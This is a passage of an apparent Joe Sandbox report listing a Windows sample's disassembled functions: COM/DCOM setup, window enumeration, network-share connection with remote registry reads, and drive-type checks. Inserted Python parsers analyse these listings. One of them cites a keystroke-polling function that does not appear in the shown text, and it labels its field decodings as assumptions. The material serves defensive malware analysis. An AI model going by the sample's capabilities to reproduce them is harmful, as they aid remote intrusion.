                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                              • String ID: X
                                                                                              • API String ID: 3104067586-3081909835
                                                                                              • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                                              • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                                              • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                                              • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                                              APIs
                                                                                              • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                                              • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                                              • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                                              • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                                              • _wcslen.LIBCMT ref: 0046CDB0
                                                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                                              • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                                              • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                                                • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                                                • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                                                • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                                              Strings
                                                                                              • NULL Pointer assignment, xrefs: 0046CEA6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                                              • String ID: NULL Pointer assignment
                                                                                              • API String ID: 440038798-2785691316
                                                                                              • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                              • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                                              • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                              • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
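The call sequence in the block above (OleInitialize, CLSIDFromProgID/CLSIDFromString, CoCreateInstance, CoInitializeSecurity with authentication level 2 and impersonation level 3, CoCreateInstanceEx with class context 0x15, CoSetProxyBlanket with EOAC_DEFAULT) is the generic client-side setup for an out-of-process or remote COM object; a WMI client reaches IWbemServices through exactly these steps. The Python below is an added example, not part of the Joe Sandbox report or of Joe Security's tooling: it parses these per-function "APIs" listings into records, keeps the indented "Part of subcall function" entries separate from the function's own calls, expands the CLSCTX and RPC_C_AUTHN_LEVEL/RPC_C_IMP_LEVEL constants that the report prints as raw hex, and flags the DCOM client sequence. SAMPLE is constructed from a subset of the listing above; the function and field names are the example's own.

```python
"""Parse the per-function 'APIs' listings of a Joe Sandbox report (added example,
not part of the report or of Joe Security's tooling; SAMPLE is constructed from the
COM client block above and every name here is the example's own)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

SAMPLE = """\
APIs
• OleInitialize.OLE32(00000000), ref: 0046CBC7
• CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
• CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
• _wcslen.LIBCMT ref: 0046CDB0
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
• CoTaskMemFree.OLE32(?), ref: 0046CE42
• CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
  • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
  • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
Strings
• NULL Pointer assignment, xrefs: 0046CEA6
• API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
"""

# "• Name.MODULE(args), ref: ADDR"; CRT entries carry no argument list, and
# indented "Part of subcall function XXXXXXXX:" entries are calls made by a callee.
_API_RE = re.compile(
    r"^(?:•\s*)?(?:Part of subcall function (?P<parent>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*"
    r"ref:\s*(?P<ref>[0-9A-Fa-f]{8})$")
_STR_RE = re.compile(r"^•\s*(?P<text>.+?),\s*xrefs:\s*[0-9A-Fa-f, ]+$")

CLSCTX = {0x1: "CLSCTX_INPROC_SERVER", 0x2: "CLSCTX_INPROC_HANDLER",
          0x4: "CLSCTX_LOCAL_SERVER", 0x10: "CLSCTX_REMOTE_SERVER"}
AUTHN_LEVEL = {0: "DEFAULT", 1: "NONE", 2: "CONNECT", 3: "CALL", 4: "PKT",
               5: "PKT_INTEGRITY", 6: "PKT_PRIVACY"}
IMP_LEVEL = {0: "DEFAULT", 1: "ANONYMOUS", 2: "IDENTIFY", 3: "IMPERSONATE", 4: "DELEGATE"}
# Generic DCOM client setup in call order; a WMI client goes through the same steps.
DCOM_CLIENT_SEQUENCE = ("CoInitializeSecurity", "CoCreateInstanceEx", "CoSetProxyBlanket")

@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: Tuple[str, ...]       # as printed; "?" = not resolved by the sandbox
    ref: str                    # call-site address
    via_subcall: Optional[str]  # parent function if the call happens inside a callee

@dataclass
class FunctionBlock:
    calls: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    api_id: str = ""

def _split_args(raw: Optional[str]) -> Tuple[str, ...]:
    return tuple(a.strip() for a in raw.split(",")) if raw and raw.strip() else ()

def parse_blocks(text: str) -> List[FunctionBlock]:
    """Start a block at each 'APIs' header; collect its calls, strings and API ID."""
    blocks: List[FunctionBlock] = []
    cur: Optional[FunctionBlock] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
        elif cur is None:
            continue
        elif (m := _API_RE.match(line)):
            cur.calls.append(ApiCall(m["name"], m["module"], _split_args(m["args"]),
                                     m["ref"], m["parent"]))
        elif (m := _STR_RE.match(line)):
            cur.strings.append(m["text"])
        elif line.startswith("• API ID:"):
            cur.api_id = line.split(":", 1)[1].strip()
    return blocks

def _hex_arg(call: ApiCall, i: int) -> Optional[int]:
    try:
        return int(call.args[i], 16)
    except (IndexError, ValueError):  # missing argument or "?"
        return None

def decode_com_flags(call: ApiCall) -> dict:
    """Expand CLSCTX / RPC_C_AUTHN_LEVEL / RPC_C_IMP_LEVEL for the COM setup calls."""
    if call.name in ("CoCreateInstance", "CoCreateInstanceEx"):
        v = _hex_arg(call, 2)  # dwClsCtx
        return {} if v is None else {"clsctx": [n for b, n in CLSCTX.items() if v & b]}
    if call.name == "CoInitializeSecurity":  # dwAuthnLevel, dwImpLevel
        a, i = _hex_arg(call, 4), _hex_arg(call, 5)
        return {"authn_level": "RPC_C_AUTHN_LEVEL_" + AUTHN_LEVEL.get(a, "?"),
                "imp_level": "RPC_C_IMP_LEVEL_" + IMP_LEVEL.get(i, "?")}
    return {}

def looks_like_dcom_client(block: FunctionBlock) -> bool:
    """True when the function's own (non-subcall) calls contain DCOM_CLIENT_SEQUENCE in order."""
    it = iter(c.name for c in block.calls if c.via_subcall is None)
    return all(any(n == want for n in it) for want in DCOM_CLIENT_SEQUENCE)
```

Run against the sample, `parse_blocks` yields one block with eight direct calls and two subcall entries, `decode_com_flags` turns the CoInitializeSecurity arguments into RPC_C_AUTHN_LEVEL_CONNECT / RPC_C_IMP_LEVEL_IMPERSONATE and the CoCreateInstanceEx context 0x15 into INPROC_SERVER | LOCAL_SERVER | REMOTE_SERVER, and `looks_like_dcom_client` returns True. When turning such a block into a detection or a similarity feature, keep the `via_subcall` entries out of the function's own call set: their `ref` addresses belong to the callee, not to this function. The API ID, Opcode ID and fuzzy hashes printed under "Similarity" are Joe Sandbox's own features and this parser only carries the API ID through as text; it does not recompute them.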
                                                                                              APIs
                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                                              • _wcslen.LIBCMT ref: 004610A3
                                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                                              • GetWindowRect.USER32(?,?), ref: 00461248
                                                                                                • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                                              • String ID: ThumbnailClass
                                                                                              • API String ID: 4136854206-1241985126
                                                                                              • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                              • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                                              • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                              • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                                              APIs
                                                                                              • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                                              • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                                              • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                                              • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                                              • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                              • String ID: 2
                                                                                              • API String ID: 1331449709-450215437
                                                                                              • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                              • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                                              • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                              • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
APIs
• GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
• LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
• LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
• __swprintf.LIBCMT ref: 00460915
• __swprintf.LIBCMT ref: 0046092D
• _wprintf.LIBCMT ref: 004609E1
Strings
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
• API String ID: 3054410614-2561132961
• Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
• Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
• Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
• Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
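The function blocks in this section repeat the same two machine-readable shapes: API call lines of the form `• Name.MODULE(args), ref: ADDR` (with indented `Part of subcall function` variants) and a `Memory Dump Source` line whose `.sdmp` name is eight dot-separated hex fields. The parser below is an added example written for this page; it is not Joe Sandbox code. It turns those lines into records, decodes the dump name, and labels the virtual-key arguments of the keyboard-polling function further down. Three things are assumptions rather than facts stated on the page: the roles of the `.sdmp` fields (fields 0, 1 and 3 line up with the `hcaresult_2_2_400000_x.jbxd` snapshot name, and fields 4 and 6 take values that are exactly Windows `PAGE_*` and `MEM_*` constants, so they are decoded as such; field 5 is left raw), the `VK_*` names for the hex arguments, and the sample text, which is constructed from lines on this page.

```python
"""Parse Joe Sandbox per-function 'APIs' and 'Memory Dump Source' listings.
Added example for this report page, not Joe Sandbox code.  Field roles of the
.sdmp name and the VK_* labels are the editor's assumptions (see lead-in)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: lines copied in shape from the keyboard-state function
# block and one subcall line on this page.
SAMPLE_BLOCK = """\
APIs
• GetKeyboardState.USER32(?), ref: 0044480E
• GetAsyncKeyState.USER32(000000A0), ref: 00444899
• GetKeyState.USER32(000000A0), ref: 004448AA
• GetAsyncKeyState.USER32(00000011), ref: 004448F5
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
Strings
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
"""

@dataclass
class ApiCall:
    name: str                      # imported function, e.g. GetAsyncKeyState
    module: str                    # DLL the report attributes it to, e.g. USER32
    args: List[str]                # raw hex arguments; '?' where unresolved
    ref: int                       # call-site address inside the dumped image
    subcall: Optional[int] = None  # set for 'Part of subcall function' lines

API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")

SRC_RE = re.compile(r"Source File:\s*(?P<file>\S+?\.sdmp),\s*Offset:\s*"
                    r"(?P<off>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")

# Windows memory constants; the page's field 4 / field 6 values fall in these sets.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Virtual-key codes that appear as arguments on this page (assumed VK_* labels).
VK = {0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN",
      0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}
POLLING_APIS = {"GetAsyncKeyState", "GetKeyState", "GetKeyboardState"}

def parse_api_lines(text: str) -> List[ApiCall]:
    """One ApiCall per '• Name.MODULE(args), ref: ADDR' line; other lines skipped."""
    calls = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                             int(m["sub"], 16) if m["sub"] else None))
    return calls

def decode_sdmp(filename: str) -> Dict[str, object]:
    """Split a dump name into its 8 hex fields.  Names are assumptions: fields
    0/1/3 match the hcaresult_<proc>_<snapshot>_<base> snapshot name, fields 4
    and 6 are decoded as PAGE_* / MEM_* because their values are those constants."""
    stem = filename.rsplit("/", 1)[-1]
    if not stem.endswith(".sdmp"):
        raise ValueError("not a .sdmp name: " + filename)
    f = [int(x, 16) for x in stem[:-5].split(".")]
    if len(f) != 8:
        raise ValueError("expected 8 fields, got %d" % len(f))
    return {"proc_index": f[0], "snapshot": f[1], "dump_id": f[2], "base": f[3],
            "protect": PAGE_PROTECT.get(f[4], hex(f[4])),
            "field5": f[5],                       # left raw: no basis to name it
            "type": MEM_TYPE.get(f[6], hex(f[6])), "module_index": f[7]}

def parse_source(text: str) -> Optional[Dict[str, object]]:
    """Decode the 'Source File: ..., Offset: ..., based on PE: ...' line, if present."""
    m = SRC_RE.search(text)
    if not m:
        return None
    info = decode_sdmp(m["file"])
    info["image_base"] = int(m["off"], 16)
    info["based_on_pe"] = m["pe"] == "true"
    return info

def keyboard_polling(calls: List[ApiCall]) -> List[str]:
    """Keys a function polls for, or [] unless it combines at least two of the
    GetKeyboardState / GetAsyncKeyState / GetKeyState family."""
    if len({c.name for c in calls} & POLLING_APIS) < 2:
        return []
    keys: List[str] = []
    for c in calls:
        if c.name in ("GetAsyncKeyState", "GetKeyState") and c.args and c.args[0] != "?":
            code = int(c.args[0], 16)
            label = VK.get(code, hex(code))
            if label not in keys:
                keys.append(label)
    return keys

if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_BLOCK)
    print(len(calls), "calls;", "polled keys:", keyboard_polling(calls))
    print(parse_source(SAMPLE_BLOCK))
```

Run against a whole section of the report, `parse_source` lets you group functions by the dump they were lifted from (here every function comes from the `PAGE_EXECUTE_READ` `MEM_IMAGE` region at `0x401000` of process 2), and `keyboard_polling` picks out the function that polls Shift, Ctrl, Alt and the Windows key, which is the static counterpart of the "Contains functionality to log keystrokes" signature in the overview.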
APIs
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
• CLSIDFromString.OLE32(?,?), ref: 004587B3
• RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
• RegCloseKey.ADVAPI32(?), ref: 004587C5
Strings
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 600699880-22481851
• Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
• Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
• Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
• Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: DestroyWindow
• String ID: static
• API String ID: 3375834691-2160076837
• Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
• Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
• Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
• Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D959
• GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
Strings
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
• API String ID: 2907320926-3566645568
• Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
• Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
• Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
• Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
APIs
  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
• DestroyAcceleratorTable.USER32(?), ref: 0047094A
• ImageList_Destroy.COMCTL32(?), ref: 004709AD
• ImageList_Destroy.COMCTL32(?), ref: 004709C5
• ImageList_Destroy.COMCTL32(?), ref: 004709D5
• DeleteObject.GDI32(00720000), ref: 00470A04
• DestroyIcon.USER32(005C0073), ref: 00470A1C
• DeleteObject.GDI32(AB991DDC), ref: 00470A34
• DestroyWindow.USER32(00450054), ref: 00470A4C
• DestroyIcon.USER32(?), ref: 00470A73
• DestroyIcon.USER32(?), ref: 00470A81
• KillTimer.USER32(00000000,00000000), ref: 00470B00
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
• String ID:
• API String ID: 1237572874-0
• Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
• Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
